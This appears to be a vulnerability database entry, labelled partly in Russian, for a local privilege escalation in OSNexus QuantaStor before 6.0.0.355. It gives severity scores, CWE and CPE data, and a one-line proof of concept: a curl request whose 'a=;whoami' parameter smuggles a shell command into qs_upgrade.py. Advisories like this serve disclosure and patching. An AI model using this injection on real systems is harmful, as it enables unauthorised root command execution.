Описание
Local users are able to execute scripts under root privileges.
POC
On the local host run the following command:
curl 'localhost:8154/qstor/qs_upgrade.py?taskId=1&a=;whoami'
Ссылки
- Third Party Advisory
- Product
- Third Party Advisory
- Third Party Advisory
- Product
- Third Party Advisory
Уязвимые конфигурации
Конфигурация 1Версия до 6.0.0.355 (исключая)
cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*
EPSS
Процентиль: 13%
0.00043
Низкий
7.8 High
CVSS3
Дефекты
CWE-269
CWE-269
Связанные уязвимости
CVSS3: 7.1
github
больше 2 лет назад
Local users are able to execute scripts under root privileges.
EPSS
Процентиль: 13%
0.00043
Низкий
7.8 High
CVSS3
Дефекты
CWE-269
CWE-269